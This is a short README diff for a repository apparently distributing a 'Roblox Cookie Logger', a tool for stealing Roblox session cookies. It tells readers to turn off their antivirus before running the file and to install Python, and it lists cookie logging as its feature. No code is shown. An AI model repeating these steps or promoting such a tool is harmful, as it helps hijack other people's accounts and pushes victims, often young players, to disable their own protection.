zbenntt/Roblox-Cookie-LoggerV3/README.md

 # Before The Steps Turn Off Antivirus🦠 Or The File Will Come Out With An ERROR Or Failed To Download Potential Virus🦠 Something Like That

+# You NEED Python For It To Work Follow This Tutorial If You Dont Know How https://www.tutorialspoint.com/how-to-install-python-in-windows# Also Click The Add To PATH Button When In The Python Installation Gui

 # Features 🛡️
 1; Roblox Cookie Logger